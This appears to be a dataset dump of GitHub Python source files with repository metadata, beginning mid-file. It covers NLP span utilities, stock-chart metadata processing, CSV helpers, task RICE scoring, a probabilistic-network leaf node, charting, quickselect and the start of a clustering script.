if x in span_positions else 0 for x in span2position.values()])\n            }\n\n            examples.append(example)\n    return examples\n\n\ndef make_spans(seq, max_len=10):\n    \"\"\"\n    Given a sequence, creates a list of spans up to and including size max_len where every span is an indexed window\n    (start_idx, end_idx, [items]). 
See make_indexed_windows for more information.\n    \"\"\"\n    spans = []\n    for span_len in range(1, max_len+1):\n        spans.extend(list(make_indexed_windows(seq, n=span_len)))\n    # now sort the spans by start position + end position (if start is the same)\n    return sorted(spans, key=lambda x: (x[0], x[1]))\n\n\ndef make_indexed_windows(seq, n=2):\n    \"\"\"\n    Return a sliding window of n items from a sequence of items. Every window is a tuple (start_idx, end_idx, [items])\n    where start_idx and end_idx are the start and end item indexes of the window items and [items] are the items\n    themselves.\n    \"\"\"\n    it = iter(enumerate(seq))\n    result = tuple(islice(it, n))\n    if len(result) == n:\n        yield (result[0][0], result[-1][0], [x[1] for x in result])\n    for elem in it:\n        result = result[1:] + (elem,)\n        yield (result[0][0], result[-1][0], [x[1] for x in result])\n\n\ndef make_span2position(seq_size, max_len):\n    \"\"\"\n    Create a dictionary (start_idx, end_idx) -> span position.\n    \"\"\"\n    seq = [0] * seq_size # getting a bit hacky here...\n    spans = make_spans(seq, max_len)\n    span2position = {}\n    for i, span in enumerate(spans):\n        span2position[(span[0], span[1])] = i\n    return span2position
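\n\n# Illustration: with seq_size=3 and max_len=2 the spans, sorted by (start, end),\n# are (0,0),(0,1),(1,1),(1,2),(2,2), so make_span2position(3, 2) returns\n# {(0, 0): 0, (0, 1): 1, (1, 1): 2, (1, 2): 3, (2, 2): 4}.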
\n\n\ndef glove_embeddings(embedding_size, emb_path=None, script_path=None):\n    \"\"\"\n    Prepare a word2vec dictionary {word -> vector} where the pre-trained vector embeddings are GloVe embeddings.\n    If the user does not have glove vectors in the project's /data directory then download them into it.\n    \"\"\"\n    emb_path = emb_path if emb_path else '{}/data/glove/glove.6B.{}d.txt'.format(BASEDIR, embedding_size)\n\n    try:\n        f = open(emb_path, 'r')\n    except IOError:\n        call(script_path if script_path else '{}/download_glove.sh'.format(BASEDIR), shell=True)\n        f = open(emb_path, 'r')\n\n    rows = f.read().split('\\n')[:-1]\n\n    def _parse_embedding_row(embedding_row):\n        word, string_embedding = embedding_row.split(' ', 1)\n        return word, np.fromstring(string_embedding, sep=' ')\n\n    return dict([_parse_embedding_row(row) for row in tqdm(rows, desc='Parsing glove file.')])\n\n\ndef make_glove_embedding_matrix(word2id, word2vec, unk=0, pad=1, unk_state=np.zeros):\n    \"\"\"\n    Takes (1) a word2id dictionary and (2) a word2vec dictionary and creates a numpy embedding matrix\n    |vocab size| x |embedding size| with matched id -> vector matrix rows. The reason why we need this function\n    is because we tend to build the word2id dict ourselves from tokenized text data whereas word2vec usually\n    comes from some outside source.\n\n    IMPORTANT:\n    - assumes word2id reserves values for pad and unknown words\n    - by default words in (1) but not in (2) are set to unk_state (e.g. np.zeros or np.random.rand)\n    - embeddings of words not found in word2id are THROWN AWAY in this function (a workaround is to make sure they're\n    included in word2id)\n    \"\"\"\n    embedding_size = len(next(iter(word2vec.values()))) # get first value from dict to find\n\n    embedding_matrix = np.zeros((len(word2id) + 2, embedding_size)) # +2 for unk & pad\n    zero_vec = np.zeros(embedding_size)\n    embedding_matrix[pad] = zero_vec # pad\n    embedding_matrix[unk] = zero_vec # unk\n\n    for word, id in word2id.items():\n        if word in word2vec:\n            vec = word2vec[word]\n        elif word.lower() in word2vec:\n            vec = word2vec[word.lower()]\n        else:\n            vec = unk_state(embedding_size)\n\n        assert embedding_size == len(vec)\n        embedding_matrix[id] = vec\n\n    return embedding_matrix\n\n\ndef vectorize_tokens(tokens, word2vec):\n    \"\"\"\n    Given a sequence of tokens, vectorize them using a word2vec dict.\n    \"\"\"\n    embedding_size = len(next(iter(word2vec.values()))) # get first value from dict to find\n\n    token_vectors = []\n    for token in tokens:\n        if token in word2vec:\n            token_vectors.append(word2vec[token])\n        else:\n            if token.lower() in word2vec:\n                token_vectors.append(word2vec[token.lower()])\n            else:\n                token_vectors.append(np.zeros(embedding_size))\n    return np.asarray(token_vectors)\n\n\ndef import_module(path):\n    \"\"\"\n    Primarily used for importing config files.\n    \"\"\"\n    spec = importlib.util.spec_from_file_location('', path)\n    m = importlib.util.module_from_spec(spec)\n    spec.loader.exec_module(m)\n    return m\n\n\ndef pad_seq(seq, maxlen, reverse=False):\n    \"\"\" Pad or shorten list of items to a specified maxlen \"\"\"\n    res = list(seq) # work on a copy so the caller's list is not mutated by the del below\n    if len(seq) > maxlen:\n        if reverse:\n            del res[:(len(seq) - maxlen)]\n        else:\n            del res[maxlen:]\n    elif len(seq) < maxlen:\n        if reverse:\n            res = [0] * (maxlen - len(seq)) + res\n        else:\n            res.extend([0] * (maxlen - len(seq)))\n    return res\n","repo_name":"andrejzg/extractive-qa","sub_path":"data_ops.py","file_name":"data_ops.py","file_ext":"py","file_size_in_byte":15585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} {"seq_id":"38312514285","text":"import sys\nsys.path.append('../..')\nimport os\nfrom datetime import datetime, timedelta\n\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom fin_app.utils.config import DataLocationConfig\nfrom fin_app.utils.logger import Logger\nfrom fin_app.data_processing.stockprice.candle_chart import creaet_candle_chart\nfrom fin_app.storage import S3\n\n\nTAG = 'create_candle_metadata'\n\n\ndef main():\n\n    df_stocklist = pd.read_csv(\n        DataLocationConfig.STOCKLIST_FILE\n    )\n\n    Logger.d(TAG, df_stocklist['銘柄コード'].unique())\n\n    codes = df_stocklist['銘柄コード'].unique()\n\n    STOCKPRICE_FILEPATH_FMT = 's3://fin-app/stockprice_concat/{code}.csv'\n\n    METADATA_LOCAL_FILEPATH = '/tmp/DAILY_WINDOW-120d_STRIDE-30d_WIDTH-0.5_stockprice_metadata.csv'\n    METADATA_S3_FILEPATH = os.path.join(\n        DataLocationConfig.STOCKPRICE_CANDLECHART_BASEDIR.replace('s3://fin-app/', ''),\n        f'metadata/DAILY_WINDOW-120d_STRIDE-30d_WIDTH-0.5/stockprice_metadata.csv'\n    )\n\n    s3_filepath_list = []\n    start_dt_str_list = []\n    end_dt_str_list = []\n    code_list = []\n    change_rate_list = []\n    for code in tqdm(codes[:]):\n        Logger.i(TAG, code)\n        files = S3.get_filelist(\n            basedir=os.path.join(\n                DataLocationConfig.STOCKPRICE_CANDLECHART_BASEDIR.replace('s3://fin-app/', ''),\n                # 'DAILY_WINDOW-120d_STRIDE-30d_WIDTH-0.5/1301'\n                f'DAILY_WINDOW-120d_STRIDE-30d_WIDTH-0.5/{code}'\n            )\n        )\n        start_dt_str = [file.split('/')[-1].replace('.png', '').split('_')[0]
 for file in files]\n        end_dt_str = [file.split('/')[-1].replace('.png', '').split('_')[1] for file in files]\n\n        s3_filepath_list += files\n        start_dt_str_list += start_dt_str\n        end_dt_str_list += end_dt_str\n        code_list += [code]*len(files)\n\n        Logger.i(TAG, f'len(files) : {len(files)}')\n        Logger.i(TAG, f'len(s3_filepath_list) : {len(s3_filepath_list)}')\n\n        try:\n            df = pd.read_csv(\n                STOCKPRICE_FILEPATH_FMT.format(code=code)\n            )\n        except Exception as e:\n            Logger.e(TAG, f'failed to load csv file from s3 : {e}')\n            change_rate_list += [None]*len(files)\n            continue\n\n        df['日付'] = pd.to_datetime(df['日付'])\n        df = df.set_index('日付')\n        df = df.rename(columns={\n            '始値': 'open',\n            '高値': 'high',\n            '安値': 'low',\n            '終値': 'close'\n        })\n        MAX_DT = df.index.max()\n\n        for sds, eds in zip(start_dt_str, end_dt_str):\n            if len(df[sds:eds]) == 0:\n                change_rate_list.append(None)\n                continue\n\n            edt = datetime.strptime(eds, '%Y-%m-%d')\n            for i in range(119):\n                try:\n                    df.loc[edt]\n                    break\n                except Exception:\n                    edt -= timedelta(days=1)\n                    continue\n                    #raise Exception('')\n            change_rate_start_dt = edt + timedelta(days=1)\n            change_rate_end_dt = change_rate_start_dt + timedelta(days=30)\n            if change_rate_end_dt > MAX_DT or len(df[change_rate_start_dt:change_rate_end_dt]) == 0:\n                change_rate_list.append(None)\n                continue\n\n            change_rate = \\\n                (df[change_rate_start_dt:change_rate_end_dt]['close'] - df.loc[edt]['close']).mean() / \\\n                df.loc[edt]['close']\n            change_rate_list.append(change_rate)\n\n        if code % 10 == 0:\n            df_meta = pd.DataFrame({\n                's3_filepath': s3_filepath_list,\n                'code': code_list,\n                'start_dt': start_dt_str_list,\n                'end_dt': end_dt_str_list,\n                'change_rate_30d': change_rate_list,\n            })\n            df_meta.to_csv(\n                METADATA_LOCAL_FILEPATH,\n                index=None\n            )\n            Logger.i(TAG, f'len(df_meta) : {len(df_meta)}')\n\n    df_meta = pd.DataFrame({\n        's3_filepath': s3_filepath_list,\n        'code': code_list,\n        'start_dt': start_dt_str_list,\n        'end_dt': end_dt_str_list,\n        'change_rate_30d': change_rate_list,\n    })\n    df_meta.to_csv(\n        METADATA_LOCAL_FILEPATH,\n        index=None\n    )\n\n    S3.save_file(\n        local_filepath=METADATA_LOCAL_FILEPATH,\n        s3_filepath=METADATA_S3_FILEPATH,\n    )\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"pondelion/FinAppBackend","sub_path":"batch/stockprice/create_candlechart_metadata.py","file_name":"create_candlechart_metadata.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} {"seq_id":"72655054510","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the encryption function below.\ndef encryption(s):\n    n=len(s)\n    row=round(math.sqrt(n))\n    row=int(row)\n    col=0\n    if row>=math.sqrt(n):\n        col=row\n    else:\n        col=row+1\n    ans=[]\n    for i in range(col):\n        j=i\n        word=\"\"\n        while j<n:\n            word+=s[j]\n            if col>row:\n                j+=row+1\n            else:\n                j+=row\n        ans.append(word)\n    return ' '.join(ans)
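\n# For example: encryption('haveaniceday') -> 'hae and via ecy'\n# (grid rows 'have', 'anic', 'eday', read column by column).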
\".backup\"))\n\ndef deleteBlankRows(out, input):\n with open(input) as in_file:\n with open(out, 'w') as out_file:\n writer = csv.writer(out_file)\n for row in csv.reader(in_file):\n if any(field.strip() for field in row):\n writer.writerow(row)\n \n\ndef calcJulian(date):\n try:\n fmt='%m/%d/%Y'\n sdtdate = datetime.datetime.strptime(date, fmt)\n sdtdate = sdtdate.timetuple()\n jdate = sdtdate.tm_yday\n except:\n return None\n return(jdate)\n\ndef changeTimeFormat(date):\n try:\n s = date.split(\"-\")\n return (s[1] + \"/\" + s[2] + \"/\" + s[0])\n except:\n return None\n\n# the date parser for the arable format\ndef parseTime(date):\n try:\n t = date.replace('T', '/').split('/')\n return (t[0] + \"/\" + t[1] + \"/\" + t[3])\n except:\n try:\n t = date.replace('T', '-').split('-')\n return (t[1] + \"/\" + t[2] + \"/\" + t[0])\n except:\n return None\n\n\ndef hasData(input: list):\n defaultData = 2\n data = 0\n for i in input:\n if i != None:\n data+=1\n return True if data > defaultData else False\n\n\ndef append_list_as_row(file_name, list_of_elem):\n if list_of_elem == None or len(list_of_elem) == 0:\n return None\n # Open file in append mode\n with open(file_name, 'a+', newline='') as write_obj:\n # Create a writer object from csv module\n csv_writer = writer(write_obj)\n # Add contents of list as last row in the csv file\n csv_writer.writerow(list_of_elem)\n\ndef append_dict_as_row(file_name, dict_of_elem, allFieldNames):\n # Open file in append mode\n with open(file_name, 'a+', newline='') as write_obj:\n # Create a writer object from csv module\n dict_writer = DictWriter(write_obj, fieldnames=allFieldNames)\n # Add dictionary word to csv\n dict_writer.writerow(dict_of_elem)\n\n\n\n# if __name__ == \"__main__\":\n# v = parseTime(\"07/24T20:00:00/2021\")\n# print(v) \n# print(calcJulian(v))","repo_name":"C-Loftus/arable-data-automation","sub_path":"csvOperations.py","file_name":"csvOperations.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27366457588","text":"# Reference: https://www.intercom.com/blog/rice-simple-prioritization-for-product-managers/\nimport json\nimport os\nfrom datetime import datetime\nfrom email.utils import parsedate_tz, mktime_tz\n\nfrom common.automator_client import client\n\n\ndef get_repo_name(url):\n split = url.rsplit('/', 3)\n return split[1]\n\n\ndef calculate_rice_reach(task):\n repo_to_reach_env_var = {\n 'sendgrid-python': 'TWILIO_SENDGRID_PYTHON_REACH',\n 'python-http-client': 'TWILIO_SENDGRID_PYTHON_REACH',\n 'sendgrid-php': 'TWILIO_SENDGRID_PHP_REACH',\n 'php-http-client': 'TWILIO_SENDGRID_PHP_REACH',\n 'sendgrid-csharp': 'TWILIO_SENDGRID_CSHARP_REACH',\n 'csharp-http-client': 'TWILIO_SENDGRID_CSHARP_REACH',\n 'sendgrid-java': 'TWILIO_SENDGRID_JAVA_REACH',\n 'java-http-client': 'TWILIO_SENDGRID_JAVA_REACH',\n 'sendgrid-nodejs': 'TWILIO_SENDGRID_NODEJS_REACH',\n 'nodejs-http-client': 'TWILIO_SENDGRID_NODEJS_REACH',\n 'sendgrid-ruby': 'TWILIO_SENDGRID_RUBY_REACH',\n 'ruby-http-client': 'TWILIO_SENDGRID_RUBY_REACH',\n 'sendgrid-go': 'TWILIO_SENDGRID_GO_REACH',\n 'rest': 'TWILIO_SENDGRID_GO_REACH'\n }\n reach_env_var = repo_to_reach_env_var.get(get_repo_name(task['url']), 'MAXIMUM_REACH')\n rice_reach = os.getenv(reach_env_var) or 0\n return float(rice_reach) + task['num_of_comments'] + task['num_of_reactions']\n\n\ndef calculate_rice_impact(task):\n if task['labels']:\n rice_impact = 1000\n if 'type: docs update' in task['labels']:\n 
\n            rice_impact = 1\n        if 'type: security' in task['labels']:\n            rice_impact = 3\n        if 'type: bug' in task['labels']:\n            rice_impact = 3\n        if 'type: twilio enhancement' in task['labels']:\n            rice_impact = 2\n        if 'type: sendgrid enhancement' in task['labels']:\n            rice_impact = 2\n        if 'type: community enhancement' in task['labels']:\n            rice_impact = 1\n        if 'type: getting started' in task['labels']:\n            rice_impact = 2\n        if 'type: question' in task['labels']:\n            rice_impact = 1\n        if task['task_type'] == 'pr':\n            rice_impact = rice_impact + 1\n        return rice_impact\n    else:\n        # This is unlabeled, we artificially inflate the\n        # score in this case to ensure it's at the top to be processed first\n        return 1000\n\n\ndef calculate_rice_confidence(task):\n    rice_confidence = 1\n    if task['language'] == 'go':\n        rice_confidence = .8\n    return rice_confidence\n\n\ndef calculate_rice_effort(task):\n    if task['labels']:\n        rice_effort = 0.0001\n        if 'difficulty: easy' in task['labels']:\n            rice_effort = 1\n        if 'difficulty: medium' in task['labels']:\n            rice_effort = 3\n        if 'difficulty: hard' in task['labels']:\n            rice_effort = 5\n        if 'difficulty: very hard' in task['labels']:\n            rice_effort = 8\n        if 'difficulty: unknown or n/a' in task['labels']:\n            rice_effort = .0001\n        return rice_effort\n    else:\n        # This is unlabeled, we artificially inflate the\n        # score in this case to ensure it's at the top to be processed first\n        return .0001\n\n\ndef http_timestamp_to_datetime(http_timestamp):\n    timestamp = mktime_tz(parsedate_tz(http_timestamp))\n    return datetime.utcfromtimestamp(timestamp)\n\n\ndef needs_updating(task_id):\n    task = get_task(task_id)\n    if not task['updated_locally_at']:\n        return True\n    updated_at = http_timestamp_to_datetime(task['updated_at'])\n    updated_locally_at = http_timestamp_to_datetime(task['updated_locally_at'])\n    if updated_at > updated_locally_at:\n        return True\n    return False\n\n\ndef get_task(task_id):\n    response = client.tasks._(task_id).get()\n    task = json.loads(response.body)\n    return task['message']\n\n\ndef get_tasks():\n    response = client.tasks.get()\n    tasks = json.loads(response.body)\n    return tasks['message']['tasks']\n\n\ndef update_rice_score(task_id):\n    if needs_updating(task_id):\n        task = get_task(task_id)  # fetch the task explicitly instead of relying on the caller's loop variable\n        query_params = {\n            \"reach\": calculate_rice_reach(task),\n            \"impact\": calculate_rice_impact(task),\n            \"confidence\": calculate_rice_confidence(task),\n            \"effort\": calculate_rice_effort(task)\n        }\n        response = client.tasks.rice._(task_id).get(query_params=query_params)\n        items = json.loads(response.body)\n        return items\n    return None\n\n\ntasks = get_tasks()\nfor task in tasks:\n    update_rice_score(int(task[\"id\"]))\n","repo_name":"sendgrid/dx-automator","sub_path":"examples/update_rice_scores.py","file_name":"update_rice_scores.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"38"} {"seq_id":"43322577325","text":"import numpy as np\nfrom math import gcd, ceil\n\ndef lcm(list_of_int):\n    \"\"\"\n    Get the Least Common Multiple (lcm) of a list of integer numbers.\n\n    Parameters:\n    --------\n    list_of_int  A List of integers\n    Returns:\n    --------\n    An integer (the lcm of list_of_int).\n    \"\"\"\n    try:\n        lcm = list_of_int[0]\n        for i in list_of_int[1:]:\n            lcm = lcm*i/gcd(int(lcm), i)\n        return int(lcm)\n    except IndexError:\n        return None
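\n# Example: lcm([4, 6, 10]) -> 60; lcm([]) -> None.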
map(condition,lst)) ]\n return list(np.where((lst>=xmin) & (lst<=xmax))[0])\n\ndef find_inds_before_after(lst, el):\n inds_sm=find_indices(lst, lambda e: e<= el)\n if len(inds_sm):\n ind_before=inds_sm[-1]\n else:\n ind_before=-1\n inds_bi=find_indices(lst, lambda e: e>= el)\n if len(inds_bi):\n ind_after=inds_bi[0]\n else:\n ind_after=-1\n return (ind_before,ind_after)\n\ndef find_highest_point( x, y):\n x=np.asarray(x, dtype=np.float64)\n y=np.asarray(y, dtype=np.float64)\n if len(y):\n max_idx=np.argmax(y)\n return (x[max_idx],y[max_idx])\n else:\n return ()\n\ndef get_samples_for_pred_check(samples, func):\n # samples = np.asarray(samples)\n shape = samples.shape\n if 0 not in shape:\n if len(shape) == 1:\n axis = 0\n else:\n axis = 1\n if len(shape) > 2:\n fir_dim = shape[0]\n sec_dim = 1\n for i in np.arange(1,len(shape),1):\n sec_dim = sec_dim*shape[i]\n samples=samples.reshape(fir_dim,sec_dim)\n if func == \"min\":\n samples = samples.min(axis=axis)\n elif func == \"max\":\n samples = samples.max(axis=axis)\n elif func == \"mean\":\n samples = samples.mean(axis=axis)\n elif func == \"std\":\n samples = samples.std(axis=axis)\n else:\n samples = np.empty([1, 2])\n if ~np.isfinite(samples).all():\n samples = get_finite_samples(samples)\n else:\n samples = np.empty([1, 2])\n return samples\n\ndef get_finite_samples(np_array):\n if isinstance(np_array, np.ndarray):\n shape = len(np_array.shape)\n if shape == 1:\n np_array = np_array[np.isfinite(np_array)]\n elif shape > 1:\n samples_idx = np.isfinite(np_array).all(axis=shape-1)\n for axis in np.arange(shape-2,0,-1):\n samples_idx = np.isfinite(np_array).all(axis=axis)\n np_array = np_array[samples_idx]\n return np_array\n\ndef get_hist_bins_range(samples, func, var_type, ref_length = None, ref_values=None):\n \"\"\"\n Parameters:\n --------\n samples Flatten finite samples\n func Predictive check criterion {'min','max','mean','std'}\n var_type Variable type in {'Discrete','Continuous'}\n ref_length A reference length for bin to estimate the number of bins\n ref_values A numpy.ndarray with the unique values of a Discrete variable\n \"\"\"\n if func == 'min' or func == 'max' and var_type == \"Discrete\":\n if ref_values is not None:\n if len(ref_values)<20:\n min_v = ref_values.min()\n max_v = ref_values.max()\n bins = len(ref_values)\n if bins > 1:\n range = ( min_v, max_v + (max_v - min_v) / (bins - 1))\n else:\n range = ( min_v, min_v+1)\n return (bins, range)\n else:\n values = np.unique(samples)\n if len(values) < 20:\n min_v = values.min()\n max_v = values.max()\n bins = len(values)\n if bins > 1:\n range = ( min_v, max_v + (max_v - min_v) / (bins - 1))\n else:\n range = ( min_v, min_v+1)\n return (bins, range)\n range = (samples.min(),samples.max())\n if ref_length:\n bins = ceil((range[1] - range[0]) / ref_length)\n range = (range[0], range[0] + bins*ref_length)\n else:\n bins = 20\n return (bins, range)\n\ndef get_dim_names_options(dim):\n \"\"\"\n dim: imd.Dimension object\n \"\"\"\n name1 = dim.name\n name2 = None\n options1 = dim.values\n options2 = []\n if \"_idx_\" in name1:\n idx = name1.find(\"_idx_\")\n st_n1 = idx + 5\n end_n1 = len(name1)\n name2 = name1[st_n1:end_n1]\n name1 = name1[0:idx]\n values = np.array(dim.values)\n options1 = np.unique(values).tolist()\n if len(options1):\n tmp = np.arange(np.count_nonzero(values == options1[0]))\n options2 = list(map(str,tmp))\n return (name1, name2, options1, options2)\n\ndef get_w2_w1_val_mapping(dim):\n \"\"\"\n dim: imd.Dimension object\n Returns:\n -------\n A Dict {: A 
 List of <values of w2> for this <value of w1>}\n    \"\"\"\n    options1 = dim.values\n    values = np.array(dim.values)\n    options1 = np.unique(values)\n    val_dict = {}\n    if len(options1):\n        for v1 in options1:\n            tmp = np.arange(np.count_nonzero(values == v1))\n            val_dict[v1] = list(map(str,tmp))\n    return val_dict\n\ndef get_stratum_range(samples, stratum):\n    median = np.median(samples)\n    if stratum == 0 or stratum == 1:\n        inds_l = np.where(samples<median)[0]\n        median_l = np.median(samples[inds_l])\n        if stratum == 0:\n            xmin = np.min(samples).item()\n            xmax = median_l\n        elif stratum == 1:\n            xmin = median_l\n            xmax = median\n    elif stratum == 2 or stratum == 3:\n        inds_h = np.where(samples>=median)[0]\n        median_h = np.median(samples[inds_h])\n        if stratum == 2:\n            xmin = median\n            xmax = median_h\n        elif stratum == 3:\n            xmin = median_h\n            xmax = np.max(samples).item()\n    else:\n        xmin = np.min(samples).item()\n        xmax = np.max(samples).item()\n    return (xmin,xmax)","repo_name":"evdoxiataka/ipme","sub_path":"ipme/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"38"} {"seq_id":"37518601137","text":"import tensorflow as tf\nfrom tensorflow_probability import distributions as tfd\nfrom libspn import utils, conf\nfrom libspn.graph.node import Node\nfrom libspn.graph.leaf.location_scale import LocationScaleLeaf\nfrom libspn.utils.initializers import Equidistant\nfrom libspn.utils.serialization import register_serializable\n\n\n@register_serializable\nclass StudentTLeaf(LocationScaleLeaf):\n\n    \"\"\"A node representing uni-variate Student-T distributions for continuous input\n    variables. Each variable will have *k* components. Each component has its\n    own location (mean) and scale (standard deviation). These parameters can be learned or fixed.\n\n    Lack of evidence must be provided explicitly through\n    feeding :py:attr:`~libspn.StudentTLeaf.evidence`. By default, evidence is set to ``True``\n    for all variables.\n\n    Args:\n        feed (Tensor): Tensor feeding this node or ``None``. If ``None``,\n            an internal placeholder will be used to feed this node.\n        num_vars (int): Number of random variables.\n        num_components (int): Number of components per random variable.\n        name (str): Name of the node\n        loc_init (float or numpy.ndarray): If a float and there's no ``initialization_data``,\n            all components are initialized with ``loc_init``. If\n            a numpy.ndarray, must have shape\n            ``[num_vars, num_components]``.\n        scale_init (float): If a float and there's no ``initialization_data``, scales are\n            initialized with ``variance_init``.\n        trainable_loc (bool): Whether to make the location ``Variable`` trainable.\n        trainable_scale (bool): Whether to make the scale ``Variable`` trainable.\n        evidence_indicator_feed (Tensor): Tensor feeding this node's evidence indicator. 
If\n ``None``, an internal placeholder with default value will\n be created.\n \"\"\"\n\n def __init__(self, feed=None, num_vars=1, num_components=2, name=\"StudentTLeaf\",\n trainable_scale=True, trainable_loc=True,\n loc_init=Equidistant(), scale_init=1.0,\n min_scale=1e-2, evidence_indicator_feed=None, softplus_scale=False,\n trainable_df=False, df_init=tf.initializers.constant(1.0),\n share_locs_across_vars=False, share_scales=False, share_dfs=False):\n self._trainable_df = trainable_df\n self._df_init = df_init\n self._share_dfs = share_dfs\n\n super().__init__(\n feed=feed, evidence_indicator_feed=evidence_indicator_feed,\n num_vars=num_vars, num_components=num_components, trainable_loc=trainable_loc,\n trainable_scale=trainable_scale, loc_init=loc_init, scale_init=scale_init,\n min_scale=min_scale, softplus_scale=softplus_scale, name=name, dimensionality=1,\n share_locs_across_vars=share_locs_across_vars, share_scales=share_scales)\n\n def _create_dist(self):\n if self._softplus_scale:\n return tfd.StudentTWithAbsDfSoftplusScale(\n self._df_variable, self._loc_variable, self._scale_variable)\n return tfd.StudentT(self._df_variable, self._loc_variable, self._scale_variable)\n\n @utils.docinherit(Node)\n def _create(self):\n super()._create()\n with tf.variable_scope(self._name):\n # Initialize locations\n shape = self._variable_shape(\n 1 if self._share_dfs else self._num_vars,\n 1 if self._share_dfs else self._num_components,\n self._dimensionality)\n shape_kwarg = dict(shape=shape) if callable(self._df_init) else dict()\n self._df_variable = tf.get_variable(\n \"Df\", initializer=self._df_init, dtype=conf.dtype,\n trainable=self._trainable_df, **shape_kwarg)\n\n @property\n def variables(self):\n \"\"\"Returns mean and variance variables. \"\"\"\n return self._df_variable, self._loc_variable, self._scale_variable","repo_name":"pronobis/libspn","sub_path":"libspn/graph/leaf/student_t.py","file_name":"student_t.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"38"} +{"seq_id":"16998495562","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport math\n\nfrom pygooglechart import Chart\nfrom pygooglechart import SimpleLineChart\nfrom pygooglechart import XYLineChart\nfrom pygooglechart import Axis\n\ndef stripes():\n \n # Set the vertical range from 0 to 100\n max_y = 100\n\n # Chart size of 200x125 pixels and specifying the range for the Y axis\n chart = SimpleLineChart(600, 500, y_range=[0, max_y])\n\n # Add the chart data\n # data = [\n # 32, 34, 34, 32, 34, 34, 32, 32, 32, 34, 34, 32, 29, 29, 34, 34, 34, 37,\n # 37, 39, 42, 47, 50, 54, 57, 60, 60, 60, 60, 60, 60, 60, 62, 62, 60, 55,\n # 55, 52, 47, 44, 44, 40, 40, 37, 34, 34, 32, 32, 32, 31, 32\n # ]\n # data2 = [\n # 55, 52, 47, 44, 44, 40, 40, 37, 34, 34, 32, 32, 32, 31, 32, 62, 60, 55,\n # 32, 34, 34, 32, 34, 34, 32, 32, 32, 34, 34, 32, 29, 29, 34, 34, 34, 37, \n # 37, 39, 42, 47, 50, 54, 57, 60, 60, 60, 60, 60, 60, 60, 62\n # ] \n data = xrange(0, 100, 20)\n data2 = [0, 20, 20, 40, 40, 80, 80, 100, 100]\n chart.add_data(data)\n chart.add_data(data2)\n \n # Set the line colour to blue\n chart.set_colours(['0000FF','00CC00'])\n\n # Set the vertical stripes\n chart.fill_linear_stripes(Chart.CHART, 0, 'CCCCCC', 0.2, 'FFFFFF', 0.2)\n\n # Set the horizontal dotted lines\n chart.set_grid(0, 25, 5, 5)\n\n # The Y axis labels contains 0 to 100 skipping every 25, but remove the\n # first number because it's obvious and gets in the way of the 
first X\n    # label.\n    left_axis = range(0, max_y + 1, 25)\n    left_axis[0] = ''\n    chart.set_axis_labels(Axis.LEFT, left_axis)\n\n    # X axis labels\n    chart.set_axis_labels(Axis.BOTTOM, \\\n        ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun'])\n\n    chart.download('line-stripes.png')\n\ndef main():\n    # simple_random()\n    # xy_random()\n    # xy_rect()\n    # xy_circle()\n    # sparklines()\n    # fill()\n    stripes()\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"meredith620/sentry","sub_path":"test/nchart/pchart.py","file_name":"pchart.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} {"seq_id":"7210868697","text":"from typing import List\n\nclass Solution:\n    def findKthLargest(self, nums: List[int], k: int) -> int:\n        def partition(begin: int, end: int) -> int:\n            if begin >= end:\n                return nums[begin]\n            import random\n            rand = random.randint(begin, end)\n            nums[begin], nums[rand] = nums[rand], nums[begin]\n            v = nums[begin]\n            i, j = begin, end\n            while i < j:\n                while i < j and nums[j] <= v:\n                    j -= 1\n                nums[i] = nums[j]\n                while i < j and nums[i] >= v:\n                    i += 1\n                nums[j] = nums[i]\n            nums[i] = v\n            if i + 1 == k:\n                return v\n            elif i + 1 < k:\n                return partition(i + 1, end)\n            else:\n                return partition(begin, i - 1)\n        return partition(0, len(nums) - 1)\n\nif __name__ == \"__main__\":\n    nums = [int(num) for num in input().split()]\n    k = int(input())\n    solution = Solution()\n    print(solution.findKthLargest(nums, k))","repo_name":"jiangshen95/PasaPrepareRepo","sub_path":"Leetcode100/leetcode100_python/KthLargestElementinanArray2.py","file_name":"KthLargestElementinanArray2.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} {"seq_id":"72694637869","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 17 21:55:31 2019\r\n\r\n@author: Administrator\r\n\"\"\"\r\n# This is the code for our IJCAI paper:\r\n# J Wen, Z Zhang, Y Xu, B Zhang, L Fei, GS Xie,\r\n# CDIMC-net: Cognitive Deep Incomplete Multi-view Clustering Network, IJCAI, 2020.\r\n# Note 1: because kmeans is used to reorder samples before training, the clustering performance is somewhat sensitive to this reordering.\r\n# Note 2: selecting suitable parameters 'learning rate' and 'lambda(gamma)' for pre-training and fine-tuning is important.\r\n# If you find the code useful, please cite our IJCAI paper.\r\n# If you find any problems, please contact Jie Wen via jiewen_pr@126.com\r\n\r\n\r\nfrom __future__ import print_function, division\r\nimport argparse\r\nimport numpy as np\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.metrics.cluster import normalized_mutual_info_score as nmi_score\r\nfrom sklearn.metrics import adjusted_rand_score as ari_score\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.nn.parameter import Parameter\r\nfrom torch.optim import Adam,SGD\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.nn import Linear\r\nfrom sklearn.preprocessing import StandardScaler, 